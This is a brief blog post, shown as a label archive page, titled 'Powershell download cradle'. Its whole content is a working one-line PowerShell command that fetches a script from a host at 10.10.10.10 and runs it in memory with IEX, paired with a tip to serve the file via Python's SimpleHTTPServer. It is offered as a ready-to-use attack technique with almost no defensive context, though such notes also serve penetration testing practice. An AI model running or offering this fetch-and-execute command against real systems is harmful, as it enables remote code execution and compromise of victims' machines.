Showing posts with label cradle. Show all posts
Showing posts with label cradle. Show all posts

Friday, February 14, 2020

Powershell download cradle

sample download cradle in conjuction with python -m SimpleHTTPServer 80

powershell -command "$z='http://10.10.10.10/a.ps1'; IEX (new-object net.webclient).downloadstring($z)"